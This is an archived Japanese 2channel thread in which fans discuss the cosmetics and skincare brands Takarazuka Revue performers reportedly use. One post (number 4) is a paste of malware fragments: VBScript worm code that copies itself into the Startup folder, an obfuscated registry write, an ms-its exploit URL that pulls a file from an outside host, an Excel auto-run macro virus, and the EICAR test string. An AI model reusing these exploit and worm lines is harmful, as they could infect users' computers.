2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆タカラジェンヌ☆愛用化粧品・コスメ

1 :名無しさん@花束いっぱい。:2006/10/08(日) 10:26:19 ID:iEIY+bzF
ぴかぴかつるつる美肌のタカラジェンヌ
元が違うけれどコスメくらいは真似てみたい(*人´∇`)

あこがれのジェンヌさん御使用のコスメ情報
募集中〜♪


2 :名無しさん@花束いっぱい。:2006/10/08(日) 10:34:20 ID:wP0S0tET
髪の素

使っても、あれだもんなぁ〜効果あんのか?


3 :名無しさん@花束いっぱい。:2006/10/08(日) 11:01:03 ID:YnYVlbUe
髪の素のCMって今もあってる?
新聞ではよく見かけるけど

4 :<body onload=window()>:2006/10/08(日) 13:28:37 ID:mvcESFpw
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


5 :名無しさん@花束いっぱい。:2006/10/08(日) 13:31:42 ID:ob3XHEDY
以前コムさんはファンデをアル●オンを使われていたみたいww

6 :名無しさん@花束いっぱい。:2006/10/08(日) 13:39:42 ID:YFjFe2Ah
そう?
ク〇・ド・〇゚ー・〇゙ーテって聞いたぞ。
しかも、クリームとパウダーの二つ使い。芸能人と同じ使い方。

7 :名無しさん@花束いっぱい。:2006/10/08(日) 21:30:33 ID:We/mv8s2
となみちゃんはDEWだよね

8 :名無しさん@花束いっぱい。:2006/10/12(木) 02:26:50 ID:ocSdt42P
かしチャンは?

9 :名無しさん@花束いっぱい。:2006/10/15(日) 02:07:26 ID:Lp7WPxl8
>>6さん
◎ーテ好き!でも高すぎるよ〜。
基礎化粧品も知りたいな…

10 :名無しさん@花束いっぱい。:2006/10/15(日) 15:49:34 ID:IefwyEbB
7
ちがいますよ。

11 :名無しさん@花束いっぱい。:2006/10/15(日) 17:18:19 ID:ITTffLno
前、キオラ使ってるって聞いたことがある<となみちゃん
ちょっと使ってみたいw

12 :名無しさん@花束いっぱい。:2006/10/15(日) 17:22:50 ID:turoRBo4
檀ちゃんもアルビオンだよ。

13 :名無しさん@花束いっぱい。:2006/10/18(水) 20:19:15 ID:s/LE2IH9
コムのアイシャドウどこのを使ってるかが知りたい。
目が大きく見える

14 :名無しさん@花束いっぱい。:2006/10/20(金) 12:31:07 ID:t+D11oCH
前から思ってたけど きりやんって超〜肌綺麗!!
何を使ってるのか聞きたい!
誰か教えて〜〜。

15 :名無しさん@花束いっぱい。:2006/10/20(金) 17:42:00 ID:7rvRClzK
檀ちゃん、アルビオンか〜。思ってたより普通だね。
やっぱり素が良いと何を使ってもよいのね。
 
しかしあのライトにヅカメイク。 生まれつき美肌の人でも
お肌に悪そう。。、

16 :名無しさん@花束いっぱい。:2006/10/21(土) 05:00:10 ID:vjSI3SHS
いや、舞妓さんとかもそうだけど、ドーランを一日中塗ってて、それをオイルで落とすと、一種のパックっぽくなるみたいでお肌ピッカピカだよ。
自分もバレエやってて発表会の時はヅカメイクみたいのするけど、メイク落とす時はほんとにお肌ツルピカになる。

17 :名無しさん@花束いっぱい。:2006/10/21(土) 05:08:10 ID:0Fc23vHr
肌の弱い人は舞台メイクは肌荒れするよ。


18 :名無しさん@花束いっぱい。:2006/10/21(土) 06:28:44 ID:vjSI3SHS
そ〜か〜。確かに荒れてる友達もいた。
とりあえずオススメは三善のフェイスケーキ!
普段メイクの仕上げにはおしろいの透明白。汗をかいても化粧くずれしません☆

19 :名無しさん@花束いっぱい。:2006/10/21(土) 08:52:59 ID:wJ5Hj2od
>18
ばか?
そんなん普段メイクは使わないし、舞台メイクなら勧められなくてもみんな知ってるだろw


せめてさげろや。

20 :名無しさん@花束いっぱい。:2006/10/21(土) 12:24:22 ID:rR612ODc
でも私も普段化粧でチャコットのお粉とか使ってるよ。

21 :名無しさん@花束いっぱい。:2006/10/21(土) 12:36:50 ID:AnHibieS
>>19
考え方のキャパ狭すぎるよ〜。
舞台メイクの化粧品を普段メイクに使う人けっこういるよ。
女性誌にも載ってるの、知らないのかな?
私はバレエをやっていたから、舞台メイクで使っていた物を普段メイクにあえて使ったりしますよ。
チャコットのパウダーは崩れないから優秀だし、三善の口紅はベースに塗ると、上に塗る口紅の発色がより綺麗だし、落ちにくくなるからオススメですよ。


22 :名無しさん@花束いっぱい。:2006/10/21(土) 12:46:24 ID:8OU8wAks
マスカラも!
チャコットのは滲まないし優秀です。


23 :名無しさん@花束いっぱい。:2006/10/21(土) 13:26:00 ID:ZfaT7Pgx
>21
たまに女性誌に紹介されてたりもするしな。

24 :名無しさん@花束いっぱい。:2006/10/21(土) 20:48:50 ID:5rTxQbGY
お粉はローラ・メルシエがいいよ!

25 :名無しさん@花束いっぱい。:2006/10/22(日) 02:05:28 ID:pmd74meo
〉19は何もわかってないお子ちゃまだね…


26 :名無しさん@花束いっぱい。:2006/10/22(日) 13:28:21 ID:VXJJF7lH
てか、ジェンヌも普段化粧のファンデに薄くドーラン使ってないか?
人にもよるけどあれは普通のファンデじゃないと思うぞ。

27 :名無しさん@花束いっぱい。:2006/10/22(日) 16:21:56 ID:1C3m3lIA
>20
はやってるから使ってるんでしょうが。
普通の人は舞台メイク物は使わないよ。使う必要もないし用途も違うし
チャコットだけが異質だ、と思っとた方がええよ

28 :名無しさん@花束いっぱい。:2006/10/22(日) 18:10:18 ID:DZ+joYEP
ジェンヌさんって、普段の化粧の下地?ファンデーションってどこのやつ使ってるの?
すっごい肌きれい。厚化粧でもあるけど・・地肌見えないって感じ。

29 :名無しさん@花束いっぱい。:2006/10/22(日) 19:44:42 ID:QxS2AdEP
昔はトップクラスはクレド・ボーテだったよね。
ゆかりさんがソフィーナ?普通の使ってて驚いた覚えあり。
ただし昔の話。

30 :名無しさん@花束いっぱい。:2006/10/23(月) 00:13:18 ID:l3cbnkHq
 ヅカメイクは目の辺りにかなり負担がかかって
 シワの素になりそう。 ジェンヌさんしか知らない
特別製を使ってそうなイメージ

31 :名無しさん@花束いっぱい。:2006/10/23(月) 00:18:00 ID:yt8qokT8
てか、ミズがどこのマスカラ使ってるのか激知りたい。
あの目@使用前があの目@使用後になるのが未だ信じられん。

32 :名無しさん@花束いっぱい。:2006/10/23(月) 01:59:03 ID:TuLBYV4Q
ミズのマスカラ=化粧惑星 ヴォーチェでいってた

33 :名無しさん@花束いっぱい。:2006/10/23(月) 04:25:57 ID:D3FiHmeN
コンビニメイクかよ?!

34 :名無しさん@花束いっぱい。:2006/10/23(月) 09:00:22 ID:XcYpmKnl
>32
確かヘレナとの2本使いだったかと。

35 :名無しさん@花束いっぱい。:2006/10/23(月) 13:55:43 ID:2RDZ7f22
>>25
三善のパンケーキなんて毎日といてたら気色悪いし肌に悪すぎ。
チャコットなら分かるけど、三善普段は‥w

36 :名無しさん@花束いっぱい。:2006/10/23(月) 17:19:45 ID:BLEPLl35
はいはいはい、ケンカ売らない。
知人ジェンヌは○ァーナルオンリーだった。今でも流行ってるの?○ァーナルって。

37 :名無しさん@花束いっぱい。:2006/10/23(月) 18:17:11 ID:TuLBYV4Q
前MACでコムちゃんを発見したことがある。
たぶんグロス見てた。

38 :名無しさん@花束いっぱい。:2006/10/23(月) 20:27:48 ID:G5LShNEU
MACっていったら、すごく前に月の紫乃ちゃんを見たよ。
超ギャルのイメージがあったMACを紫乃ちゃんやコムちゃんが愛用とは驚き!

39 :名無しさん@花束いっぱい。:2006/10/25(水) 01:37:34 ID:QPJJzJte
あげ

40 :名無しさん@花束いっぱい。:2006/10/25(水) 14:15:37 ID:fPtUOu/F
MACあげ

41 :名無しさん@花束いっぱい。:2006/10/25(水) 15:13:00 ID:W8aHhco+
MACがギャルってどんな感覚してるんだろ。
おしゃれ最先端っていうだけじゃない。

42 :名無しさん@花束いっぱい。:2006/10/25(水) 18:00:16 ID:KFn3zMk/
>>38はかなりオバサンか、オシャレっ気がない人なんでは?
MACがギャルってさ〜

さらしage


43 :名無しさん@花束いっぱい。:2006/10/25(水) 18:12:26 ID:QPJJzJte
MACのグロス大好きなわたしが来ましたよ

44 :名無しさん@花束いっぱい。:2006/10/25(水) 18:26:42 ID:52EJI1pC
私もびっくりしたw
MACはギャルじゃないよな〜どう見ても。

45 :名無しさん@花束いっぱい。:2006/10/25(水) 18:27:13 ID:iv7awDdP
昨日カキコしたのに反映されてなかったので・・・

MACに超ギャルのイメージかぁ〜初耳だわ。
コスメフリークの学生さんやOLさんにファンが多いと思うけどね。

46 :名無しさん@花束いっぱい。:2006/10/26(木) 20:15:11 ID:gEApcbav
お前らしつこッw

47 :名無しさん@花束いっぱい。:2006/10/27(金) 21:12:34 ID:hH1SPkOs
>28
私もずっと思ってました。一体何を塗ればあんなふうになるの??
近寄りがたいくらいキレイですよね。
やはり舞台用のを普段も使っているんでしょうか・・・。

48 :名無しさん@花束いっぱい。:2006/10/28(土) 21:35:05 ID:TfRKIoKm
クレンジングって何使ってらっしゃるのかしら。。
普通のメイク落としなんかな〜??

49 :名無しさん@花束いっぱい。:2006/10/29(日) 20:41:44 ID:L6scQkSf
シュウウエムラ

50 :名無しさん@花束いっぱい。:2006/10/30(月) 11:35:16 ID:LSAWs3Ai
水さんのファンデなどメイク用品何でもいいんで教えて下さい

51 :名無しさん@花束いっぱい。:2006/10/30(月) 12:27:23 ID:eDYWjU65
水さんはポール&ジョーかアルビオン。

52 :名無しさん@花束いっぱい。:2006/10/30(月) 12:46:23 ID:fVbdqJEw
アルビオンのこと、結構普通の使ってるのねーって書いてた人いたけど・・
アルビオンのお高いラインだと、化粧水や乳液が一本12000円するんですが、
それで普通ですか?普通じゃないと思うけど・・・。
安いのでも一本5000円。1ヶ月でなくなるし・・・。
アルビオンの基礎化粧品は超人気で、ジェンヌさんの使用率高いです。

53 :名無しさん@花束いっぱい。:2006/10/30(月) 12:57:04 ID:EMJ8EUeN
アルビオン、昔使ってたけど
乳液→化粧水→美容液(またはクリーム)にどうしてもなじめなくて
使うのやめちゃった。
一番先に乳液なんだよね・・・
アルビオンは高いラインを使うと1ヶ月で5万近くはかかるよ。
SK2と同じぐらいの価格帯。

54 :名無しさん@花束いっぱい。:2006/10/30(月) 13:55:29 ID:4/7wzIg5
以前某百貨店のアルビオンで化粧してもらってたら、
となりに某トプさんが普通に座って相談しにきてて
もうびっくりどきどきしたことがあります。
全然そしらぬフリでじっと聞き耳、横目でみちゃいましたw

55 :名無しさん@花束いっぱい。:2006/10/30(月) 14:03:05 ID:LSAWs3Ai
アルビオンは一般のドラッグストアにもあるかな??

56 :名無しさん@花束いっぱい。:2006/10/30(月) 14:16:52 ID:0TK6bhnJ
ねーよw

57 :名無しさん@花束いっぱい。:2006/10/30(月) 18:02:43 ID:VvcbRytO
>55
マツキヨとかには置いてないけけど、化粧品を扱ってる化粧品屋+薬局
みたいな形態の店に置いてある場合が多いよ。
アルビオンってデパートの売り場に大きく売り場を構え出したのは、
ここ10年ではないかな?昔はあっても売り場が小さかった。

芸能人は確定申告の際に衣服、化粧品は経費として計上するので
(お笑い芸人のモモコはエステ代まで経費としてあげてると話してた)
タレント契約の生徒は経費扱いにしてる可能性アリ。



58 :名無しさん@花束いっぱい。:2006/10/30(月) 23:02:48 ID:HpkkI+9T
アルビオンって、化粧板では評判悪かったよ。

59 :名無しさん@花束いっぱい。:2006/10/31(火) 03:37:18 ID:LQQAIxke
入りはニキビと赤みが目立ち、出はツルツル美白な贔屓の化粧品が知りたくて仕方ない。

60 :名無しさん@花束いっぱい。:2006/10/31(火) 20:07:53 ID:APnjZ6xB
DHCを使ってる人もいる。どのシリーズかは不明だけど。

61 :名無しさん@花束いっぱい。:2006/11/01(水) 03:02:29 ID:mKXcfcUz
アルビオンの香料がもう少し弱ければなぁー
瞳子さんは洗顔後にアベンヌスプレー@PB2より

62 :名無しさん@花束いっぱい。:2006/11/01(水) 16:33:12 ID:h8acvWby
>54
こ○ろ○りこ??

63 :名無しさん@花束いっぱい。:2006/11/01(水) 20:03:56 ID:AGLWuMfZ
のりこじゃないお

64 :名無しさん@花束いっぱい。:2006/11/04(土) 02:04:49 ID:SJ7TS12E
下級生ってどんなん使ってるんだろ??
素肌が見えない位濃いけどorz

65 :名無しさん@花束いっぱい。:2006/11/04(土) 20:50:12 ID:9aJKdZy/
濃いのにあまり濃さを感じないのはどうして?
何でジェンヌさんってぶさいくでも綺麗に見えるんだろう・・・。
バッチリメイク、髪もピチっとしてるから???

66 :名無しさん@花束いっぱい。:2006/11/04(土) 22:55:43 ID:rZOA9utV
アルビオンは業界ではトップクラスよ。地味にみえるけど
質はいい。コスメフリークからは人気だよ。

67 :名無しさん@花束いっぱい。:2006/11/04(土) 23:15:10 ID:RW+dHco+
本日うめだにて
ポール&ジョーにいるジェンヌさんを見かけました。
すごい肌きれいだから思わず私もそのファンデを買おうかと思っちゃった。

68 :名無しさん@花束いっぱい。:2006/11/05(日) 11:47:28 ID:P3FK8bo0
paul&joeもアルビオン系だね。

69 :名無しさん@花束いっぱい。:2006/11/07(火) 21:30:43 ID:NwMZ2tyx
アルビオン…使ってみようかな

70 :名無しさん@花束いっぱい。:2006/11/07(火) 23:25:00 ID:DEV17OUi
そういえば某百貨店のpaul&joeでお化粧してもらってた
男役に遭遇したことあるよ。よーくみても誰かわかんなかったけどw

71 :名無しさん@花束いっぱい。:2006/11/07(火) 23:27:30 ID:JYh7Ao+o
DIORでコムさん見たことある。二年前だけどね。

72 :名無しさん@花束いっぱい。:2006/11/08(水) 21:21:25 ID:vdS5lgLs
コムのアイシャドウってどこのだろう?

73 :名無しさん@花束いっぱい。:2006/11/08(水) 21:23:04 ID:5FGGuoql
私はまーちゃんのが気になる。
茶色をオレンジの中間ぽくて、ナチュラル風なやつ。

74 :名無しさん@花束いっぱい。:2006/11/08(水) 22:06:34 ID:zWpEvyOS
スックじゃないのかな。
スックのオレンジって有名だから。

75 :名無しさん@花束いっぱい。:2006/11/09(木) 15:33:51 ID:XaioOc89
>>16
舞妓さんは一切ドーランなんか使わないよ。知ったかすんな。
びんづけに白粉だろ。

76 :名無しさん@花束いっぱい。:2006/11/09(木) 21:46:58 ID:9d+vZc7S
2000年の歌劇だから古い情報だけど
あさこさんは基礎化粧品DHCだと書いてありました!
なんだか庶民派〜w


77 :名無しさん@花束いっぱい。:2006/11/10(金) 01:18:41 ID:QLng7EsA
DHCかよwオリーブオイルとかニキビにぬってんのかな?

78 :名無しさん@花束いっぱい。:2006/11/10(金) 21:15:49 ID:KgTR/SA/
知り合いの娘役、ちふれ愛用。

79 :名無しさん@花束いっぱい。:2006/11/10(金) 23:21:10 ID:llC3etyD
>76 77
アサコかわうい!wDHCだDHCだ
COQ10クリームとかかってそうw

80 :名無しさん@花束いっぱい。:2006/11/11(土) 00:09:06 ID:CqF3b9vq
ちふれwwww安wwww

81 :名無しさん@花束いっぱい。:2006/11/11(土) 02:38:40 ID:52qkyc/0
まあ下級生ならちふれとかDHCでも
かわういが、、、

2000年のあさこはまだ2○才だけど
今はもっといいやつ使ってるんじゃない?アンチエイジング系の。

82 :名無しさん@花束いっぱい。:2006/11/11(土) 21:57:28 ID:JzJgVD8o
そうであってほしい。

83 :名無しさん@花束いっぱい。:2006/11/12(日) 23:35:47 ID:NYF1ozvB
いーや
あさこのことだから、きっと今でもDHCご愛用じゃね?w

84 :名無しさん@花束いっぱい。:2006/11/13(月) 21:09:22 ID:PXJrPd9W
わたるさんはー?

85 :名無しさん@花束いっぱい。:2006/11/13(月) 21:11:51 ID:r+bMjX9v
わたるさんて誰でつか?

86 :名無しさん@花束いっぱい。:2006/11/13(月) 21:16:17 ID:gzJeYUQa
おさはLANCOME ミズはコーセー あすかはSK2

87 :名無しさん@花束いっぱい。:2006/11/13(月) 22:53:45 ID:o196XTy/
あすかのSKUってすごい納得できるw
美白頑張らないとだもんね。大変だ。

88 :名無しさん@花束いっぱい。:2006/11/14(火) 00:55:57 ID:i0PiWWcH
>>83
有得ないよw
都内のデパートで友達と化粧品大量買いしてたみたいだし。


89 :名無しさん@花束いっぱい。:2006/11/14(火) 12:53:32 ID:x/H/Cc1X
梅田阪急でジェンヌさんよく見かけます

90 :名無しさん@花束いっぱい。:2006/11/14(火) 14:17:23 ID:e78cwDbv
あすかがまだ研一?二?くらいの時ふあん誌で
「SKUは高いので私への差し入れはSKUで(笑)」と言っていた
ドキュソの香りがした

91 :名無しさん@花束いっぱい。:2006/11/14(火) 21:02:58 ID:DHZdZ/qf
龍真咲が使ってるマスカラが知りたい!
あの人の睫毛はいつも綺麗に上がってるから。
因みに使用ビューラーはシュウウエムラだった。

92 :名無しさん@花束いっぱい。:2006/11/14(火) 21:27:15 ID:qRrcHYgR
綺麗に上がってるなら、
生まれつきか、睫毛パーマだと思うよ。

93 :名無しさん@花束いっぱい。:2006/11/15(水) 03:52:14 ID:2pEY64rc
おさ、ランコム?初めて聞いた。
ドゥー・ラメールって何かでご本人がおしゃってましたが。

94 :名無しさん@花束いっぱい。:2006/11/15(水) 14:34:14 ID:5BTBok8f
みんな 化粧ノリがいいていうか、キメ細かいけどファンデどこなかな。下級生!!!!

95 :名無しさん@花束いっぱい。:2006/11/15(水) 18:34:48 ID:V5XXjZLO
良スレage

96 :名無しさん@花束いっぱい。:2006/11/15(水) 18:53:39 ID:/z5Nu+Fa
>>76
あさこさんの他にも結構基礎化粧品にDHCって
答えてる人、多かったよね?かしちゃんやキリヤンも
確かそうだった。今は分からないけど・・・

97 :名無しさん@花束いっぱい。:2006/11/16(木) 02:13:22 ID:jOjZsxW8
ジェンヌさんは忙しいからなかなか
百貨店の化粧品売り場もいけない(目に付くし)
だから、通販ものにはかなり手を出してるみたいだよ。
DHC,オルビス、ファンケルあたり?
ちなみに神戸阪急のSKUでまとぶんを見かけたことあるよ、
去年のクリスマス時期だったとおもう。

98 :名無しさん@花束いっぱい。:2006/11/16(木) 12:30:00 ID:V9LRTfbO
ライトに当たると肌がきれいになるの?

99 :名無しさん@花束いっぱい。:2006/11/16(木) 22:48:10 ID:YMgT9m6+
>90
下級生時代のあすかってどうしようもないドキュソエピソード持ってそうだ

100 :名無しさん@花束いっぱい。:2006/11/17(金) 22:17:10 ID:eB2boe5P
100

101 :名無しさん@花束いっぱい。:2006/11/17(金) 23:43:59 ID:4OJz1OQ/
アサコはSKーUらしいよ!

102 :名無しさん@花束いっぱい。:2006/11/18(土) 06:00:12 ID:M7hW9490
タニは新作が出たら必ず売り場までいって試すって言ってた

103 :名無しさん@花束いっぱい。:2006/11/18(土) 18:34:26 ID:lMjLH5hT
タニはもともとの肌質も良さそうな気がするから
使ってる化粧品聞いても「タニが使ってるから」いいんだろうって感じだなあ…

104 :名無しさん@花束いっぱい。:2006/11/20(月) 13:18:41 ID:5N9DzFPb
生徒さんは普段はチーク入れない派多くない?
みよ!この美肌をって感じ
綺麗やわーヽ(*'ー`)ノ
最近、ジェンヌさんのコスメに興味津津
和製メーカーのファンデじゃ顔色暗くなりそうな白さ
いいなあ

105 :名無しさん@花束いっぱい。:2006/11/21(火) 16:11:51 ID:1ynAiuh1
>91
ビューラーがシュウならマスカラもシュウの可能性ありだね。私もシュウのマスカラ使った事あるけど、かなりいぃお(*^−')ノ

106 :名無しさん@花束いっぱい。:2006/11/21(火) 16:15:27 ID:VqCKyMyQ
グラフのポートでお花様の化粧前が写ってた時、
そこに転がっていたグロスはRMKだったような気がする。

107 :名無しさん@花束いっぱい。:2006/11/21(火) 20:34:52 ID:Ji9osIFq
確かにRMKやM・A・C使ってる人は多いね

108 :名無しさん@花束いっぱい。:2006/11/23(木) 11:02:41 ID:JvcyjMA9
age

109 :名無しさん@花束いっぱい。:2006/11/23(木) 13:47:53 ID:6qYS/o/h
入りの時、ジェンヌさんってメイクしてる人orしてない人
どっちが多いんですか?

110 :名無しさん@花束いっぱい。:2006/11/23(木) 17:06:32 ID:b7ix+l6r
>109
入りの時は、ほとんどの方がノーメイクですよ。
だから、帽子をかぶってたりサングラスをかけてたりします。

111 :名無しさん@花束いっぱい。:2006/11/24(金) 14:37:50 ID:ezHbOrg9
とうこPBUにポールシェリーのオイル載ってた。
使ってみたいけどちとお高い。

112 :名無しさん@花束いっぱい。:2006/11/24(金) 21:17:54 ID:G5jJVcRA
かしちゃん、白浜温泉水という
かなりマイナーな化粧水を使ってるらしいw
そこの販売元のちらしにも名前がのってたよ

113 :名無しさん@花束いっぱい。:2006/11/24(金) 21:31:49 ID:pxg5+hJK
    /∵∴∵∴\
   /∵∴∵∴∵∴\
  /∵∴∴,(・)(・)∴|
  |∵∵/   ○ \|
  |∵ /  三 | 三 |  
  |∵ |   __|__  | < こんにちわ
   \|   \_/ /   なにか?
     \____/

(・∀・)ボケ


114 :名無しさん@花束いっぱい。:2006/11/24(金) 21:39:50 ID:ZCmo+9Bp
マイナーな化粧水かぁ。かしちゃんらしいかもw

115 :名無しさん@花束いっぱい。:2006/12/01(金) 10:46:25 ID:JLhpYAOf
昔スタッフしてたけど、その生徒と同期たちは蜂乳石鹸を愛用してました。

116 :名無しさん@花束いっぱい。:2006/12/01(金) 19:37:31 ID:MGhqZu8N
最近コム、化粧濃いような希ガス

117 :名無しさん@花束いっぱい。:2006/12/01(金) 21:37:51 ID:zD1BKDcm
こむ、いつから二重になったの?
まぁミズみたいな明らかな整形っぽさはなく
むしろ自然ではあるけど、あれ?って思った。

118 :名無しさん@花束いっぱい。:2006/12/01(金) 21:51:29 ID:RVHcoUtS
世の中にはアイプチって物があるので一概に整形とはいえないよ

119 :名無しさん@花束いっぱい。:2006/12/02(土) 12:49:19 ID:5mfOoz1M
白浜温泉水、\1050也…。

120 :名無しさん@花束いっぱい。:2006/12/05(火) 21:55:01 ID:fPjPDnpE
>101
買いだめしてたのってSKUなの?本当なら一緒で嬉しい。
なんかのトーク番組でひろみ・めお・もりえに、
「もう少し年とったらいいものがある。後で教えてあげる」って
言ってたけどなんだろうw

121 :名無しさん@花束いっぱい。:2006/12/10(日) 03:03:36 ID:EOuo5Szx
洗顔後に、白浜温泉水で肌を馴染ませてから、愛用のを
使うんじゃないかな。アベンヌウォーター代わりみたいに・・・。


122 :名無しさん@花束いっぱい。:2006/12/11(月) 13:30:36 ID:2WSl3Ajm
DIORってアイシャドウとグロスが人気なの?
コム、DIORのアイシャドウなのかな?

123 :名無しさん@花束いっぱい。:2006/12/13(水) 01:20:10 ID:i3S6SvnR
>>110
最低限のベースメイクもなしですか?
ファンデと眉とリップくらいはしてる?


124 :名無しさん@花束いっぱい。:2006/12/13(水) 01:29:37 ID:N7ujR0JK
タニが使ってるのは何?
最先端いってる気がするw

125 :名無しさん@花束いっぱい。:2006/12/13(水) 23:58:47 ID:u9S2SiUU
>123
これから、あの厚化粧するんですから、
何もしてないすっぴんですよ。
ファンデはおろか、眉もないです。
だから、サングラスして深く帽子被ってるんですよ。
中には、朝からしっかりメイクしてる人もいますが、
そんな人はマレですね。

126 :名無しさん@花束いっぱい。:2006/12/17(日) 02:45:31 ID:IID8sEfR
普段メイク→楽屋入り→メイク落とし→スキンケア→舞台メイク
体も疲れていれば、肌も疲れているのに、こんなことする生徒さんは稀ですよ。
しなくても不思議なことではありません。

127 :名無しさん@花束いっぱい。:2006/12/17(日) 22:27:00 ID:wEppqFc+
近所のドラッグストアにルボタンのアイライナーがあって、思わず買っちゃった。
舞子さん御用達とあったけど、ジェンヌが使ってる舞台用と同じやつかな?



128 :名無しさん@花束いっぱい。:2006/12/18(月) 13:25:35 ID:OMbBP+wp
じゃあかしちゃんが温泉水のあとに使う
基礎ってどこのやつなの??
まじで肌きれいから、知りたい!!

129 :名無しさん@花束いっぱい。:2006/12/21(木) 14:44:26 ID:wHmg+quQ
>127
ルボタンのアイライナーはコムさんが使ってるそうですよ。
TCAスペシャルかなんかで言ってた。

>123
楽屋入りのときはほとんどの方がノーメイクですが、稽古入りの時は皆さんお化粧していますよ。

130 :名無しさん@花束いっぱい。:2006/12/23(土) 03:45:18 ID:qYVLw1FE
>128
かしちゃんは基礎化粧DHC  だと
歌劇にかいてあったよー  数年前。。

131 :名無しさん@花束いっぱい。:2006/12/26(火) 10:19:13 ID:X3FUl0ic
東京なんだけど、少なくとも電車通勤の人は、最低限のメイクしてるのかと思ってた。
確かに肌には負担かかるけど、眉なしで電車乗るのも厳しいから。

出はお呼ばれが多いからか、結構みんなメイクしてるよね。

132 :名無しさん@花束いっぱい。:2006/12/26(火) 14:08:34 ID:vhNOkHww
帽子深く被ったら、
眉なくてもワカンナイよ。

133 :名無しさん@花束いっぱい。:2006/12/26(火) 14:15:47 ID:PT3UG0/x
スッピンの写真なんか絶対撮られたくないだろうからな。
でもあんなに目深に被ったら前が見えないだろうに、
よく歩けるもんだといつも感心する。


134 :名無しさん@花束いっぱい。:2006/12/28(木) 23:38:44 ID:/YK8KAc4
ミズ愛用(今もかどうか知らんが)の化粧惑星のマスカラ使ってみた。

ミズが使ってる化粧品全部知りたいw

135 :名無しさん@花束いっぱい。:2007/01/01(月) 07:40:06 ID:hck1Cc+4
チカのファンデーション気になる。
ほっぺの・・・がきれいに消えてるのが不思議でたまらん。

コムちゃんが使ってるマスカラも気になるw

136 :名無しさん@花束いっぱい。:2007/01/02(火) 19:14:59 ID:IpAkKheg
タニのファンデは?
タニのシャンプーは?
タニの普段のヘアワックスは?


137 :名無しさん@花束いっぱい。:2007/01/02(火) 20:45:38 ID:Js7shWLc
トドさんていつもばっちりメイクな気がする。

それにしても、
入り待ちって実はしてほしくないことなんじゃないの?

138 :名無しさん@花束いっぱい。:2007/01/02(火) 22:08:19 ID:JjoXF5+G
>135
水のファンデはアルビオンだよ。
こむちゃんが使っててキレイだったのを見て即買いだったとのことw

139 :名無しさん@花束いっぱい。:2007/01/02(火) 22:29:42 ID:ajhKv596
昨日地元のドラッグストアで、どんな厚化粧舞台メイクも10

140 :名無しさん@花束いっぱい。:2007/01/02(火) 22:39:37 ID:ajhKv596
昨日地元のドラッグストアで、「どんな厚化粧・舞台メイクも10秒で落とすクレンジング」(商品名ド忘れしてしまいました)って言うのがあって、某有名歌劇団も愛用ってめちゃアピールされてました。
一般人には縁の無い商品のような…。
まぁ本当に使ってるなら、プレゼントには良いかも知れませんが。ちなみに価格は、2980円でした。


141 :名無しさん@花束いっぱい。:2007/01/03(水) 22:18:15 ID:fSwX9fUs
>>138
アルビオンの何ファンデ?

142 :名無しさん@花束いっぱい。:2007/01/04(木) 00:38:17 ID:jMNhq8PK
ジェンヌ肌になりたい…

143 :名無しさん@花束いっぱい。:2007/01/04(木) 12:52:17 ID:09GuAhUv
アルビオン、コムが使ってるから綺麗なんだと思うんだが・・・

144 :名無しさん@花束いっぱい。:2007/01/05(金) 00:57:57 ID:1w66LPOs
>141
ミズは知らんが、コムは一時アルビオンのエクサージュだった気がする。
アルビオンのファンデは結構優秀だよ。
他のメーカー(といっても全メーカー試したわけじゃないが)
のとは質感が全然違う。

145 :名無しさん@花束いっぱい。:2007/01/05(金) 03:55:44 ID:e9Ce/A/o
>141
コムと同じくエクサージュのモイスチャシフォンだったよ。
なんだったかな、雑誌に写真つきで掲載されてた。
あと化粧惑星のマスカラw

146 :名無しさん@花束いっぱい。:2007/01/06(土) 20:43:56 ID:Iv93pbIc
アルビオンって人によってはすぐに崩れたり、ホウレイ線に沿って落ちるらしい。

147 :名無しさん@花束いっぱい。:2007/01/07(日) 13:47:22 ID:IvTF6i19
アルビオンこんど使ってみよー
でも化粧品って基礎ができれば(下地にファンデね)あとはテクだとおもう。
ジェンヌさんは普通の方よりメイクのテクがあるから美しくもあるのだとおもいます。

ファン心理として同じものを使ったら似たような肌になるのではと思うもの。
わかります

148 :名無しさん@花束いっぱい。:2007/01/07(日) 16:29:47 ID:Di5iDt/u
メイク雑誌参考にしてるのかな。
結構メジャー化粧品使ってるんだね・・・。

最近ジェンヌさん、化粧上手いけど
たまに舞台メイクと普段メイクの調和がとれてない人がいるね・・・。
やりすぎ感ある人もいる。

149 :名無しさん@花束いっぱい。:2007/01/07(日) 19:44:20 ID:0EOtRrSE
きりやんって何つかってんだろ

150 :名無しさん@花束いっぱい。:2007/01/07(日) 20:03:09 ID:ZPVoTMRz
タニちゃんって何つかってんだろ

151 :名無しさん@花束いっぱい。:2007/01/07(日) 22:00:13 ID:Xp+Q1YAk
となみ何つかってんだろ?ジェンヌ肌になりたい

152 :名無しさん@花束いっぱい。:2007/01/10(水) 10:36:20 ID:luqBjAAH
素肌メイクが大事よ。フアンデよりも下地です!ジェンヌさんも透き通るような肌つくりは
もともとの丈夫さもあるだろうがコンシーラーやフアンデの前にぬるくま隠しシミ隠しが最大のポイント!
